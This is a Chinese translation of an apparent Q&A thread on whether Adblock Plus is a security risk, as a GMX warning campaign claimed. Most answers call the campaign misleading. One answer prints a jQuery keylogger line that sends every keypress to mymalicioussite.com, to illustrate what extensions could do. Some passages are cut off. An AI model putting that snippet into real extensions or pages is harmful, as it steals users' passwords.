我的电子邮件提供商的http://www.gmx.de网站http://www.browsersicherheit.info/(这是该网站的引述及其翻译:
Solche Add-ons haben Zugriff auf alle Ihre Eingaben im Browser und können diese auch an Dritte weitergeben – auch Ihr Bank-Passwort。Dies kann auf allen Web-Seiten passieren。Sicherheitsmechanismen wie SSL können das nicht verhindern。
翻译:
此类插件可以访问您浏览器的所有输入,也可以将它们转发给第三方——甚至是您的银行密码。这可能发生在所有网站上。SSL 等安全机制无法避免这种情况。
好吧,他们提到了其他(很明显是垃圾软件)插件,但 Adblock Plus 真的是一个安全威胁,还是该网站的运营商只是利用这个机会试图吓唬没有经验的用户再次查看他们的广告?
它不是。这是 GMX 的 FUD(恐惧、不确定性和怀疑)活动,因为他们想要展示他们的广告。上述广告拦截器绝对没有安全风险。他们在列表中添加了一些垃圾软件,使其看起来更合法。
当然,这样的活动是非常不寻常的,尤其是来自像 GMX 这样的大型知名公司。不幸的是,我手头没有英文资料(因为这是一个仅限德语的活动),但由于您会说德语,您可能想在 heise.de 阅读这篇文章。
更新 #1:GMX 背后的公司 United Internet 因错误地声称他们的 PC 存在安全风险而误导客户而受到很多批评。《华尔街日报》(德文版)将 GMX 上显示的警告及其链接的网站命名为“恐吓活动”。
更新 #2:GMX 现在表示,当您使用广告拦截器时,他们将不再显示链接,但如果您使用注入广告的垃圾软件,他们仍会显示链接,网站上的列表http://www.browsersicherheit.info/已相应更新,现在仅列出一小部分垃圾软件。此列表绝不是完整的,因此当您想知道您的浏览器是否安装了垃圾软件时,它不是一个可靠的来源。但是,United Internet 仍然坚持不希望访问其网站的用户使用广告拦截器的立场,并表示他们将在未来开发其他反拦截方法(德国来源)。
更新
仔细考虑之后,我不得不同意其他答案,尽管它可以访问您的数据,但Adblock 更有可能保护您的隐私而不是入侵它。真正的风险是提示您在计算机上安装软件的恶意广告。Adblock 可以防止这些。
以下是原始的警告答案:
Adblock Plus 是由独立开发者开发的浏览器扩展/插件。Adblock 可以访问所有页面上的 DOM(文档对象模型)。
AdBlock 的工作方式是将脚本注入到您的浏览器中,该浏览器会搜索 DOM,然后hide()针对它确定的广告运行一个函数。
这意味着 AdBlock(以及任何具有该权限的 Chrome 扩展程序)可以访问您的 DOM。Adblock 无法访问 JavaScript 变量。
这是什么意思?
如果您在使用安全身份验证的网站上,并且有一个 JavaScript 对象,其中包含 AuthKey 之类的私有内容,那么您是安全的。AdBlock 无法访问 JavaScript 变量。
但是,AdBlock 可以运行与此等效的代码。
$(window).onKeyPress(function(e){$('html').append('<img src='http://mymalicioussite.com/stealData/keyPress.png?key=' + e.keyCode)})
这基本上会将您按下的任何键路由到远程服务器。
这可用于窃取您的密码,这比窃取您的令牌更糟糕。
在我看来,AdBlock 并不过分危险,因为开发人员已经表明了自己的身份,并且被数百万人使用。如果它在做上述那种狡猾,可能有人会注意到并吹响哨子。
但不要认为 Chrome 扩展程序是完全安全的。他们都可以窃取任何数据以及其他恶意内容。
Chrome 扩展程序还可以非常简单地执行以下安全违规行为......
http://mymaliciousserver. 这是微不足道的。经讨论验证,AdBlock 是开源的。这应该让您更加信任 AdBlock,但请记住它仍然能够做这些事情。我已经查看了源代码,我可以肯定地说我根本不知道发生了什么。
资料来源:我是一名 JavaScript 和 Chrome 扩展开发人员。
这实际上归结为信任问题。确实,今天 AdBlock 扩展是安全的。我们知道它不会窃取您的数据,即使 - 正如其他答案所指出的那样 - 它具有这样做的技术能力。
但是,Chrome 扩展程序是静默自动更新的。
你相信 AdBlock 扩展的开发者不会添加恶意代码吗?我个人是这样的——拥有数百万用户,恶意代码会很快被注意到,并且无疑会成为开发人员的职业杀手。
即使您确实信任开发人员,仍然存在可能暴露您的不太可能的情况:
对于偏执狂,可以通过以下方式缓解这些问题:
因此,虽然说“不,没有风险”在智力上是不诚实的,但 GMX 完全夸大了风险。正如我相信谷歌会给我一个不会窃取我个人数据的浏览器一样,我相信 AdBlock 开发者会给我一个不会窃取我的数据的扩展程序。
使用恶意代码更新扩展的风险足够小,我不必担心,如果我确实有丝毫担心,禁用扩展很容易。
所有软件都存在安全风险,但在这种情况下,他们的说法具有误导性。
就像所有的建议都可能是坏的,所有的交易都可能是欺诈性的。“风险”只是意味着您的安全得不到保障,在 100% 的情况下都是如此。
但就 AdBlock Plus 而言,该软件是由一个在保护用户利益方面有着良好记录的团队所熟知和开发的。此外,它是开源的,因此您可以使用源代码检查自己是否存在任何安全问题。所以在这种情况下,风险是最小的;甚至微不足道。
相反,GMX 使用一个真理(“软件总是有风险的”)来暗示这个软件是危险的,这充其量是误导性的,并且可能是诽谤性的。这就像一个餐馆老板散发传单说他的竞争对手可能正在毒害他们自己的食物。从技术上讲,这是真的,因为你说的是“可能”而不是“是”,但这种行为从根本上来说是不诚实的。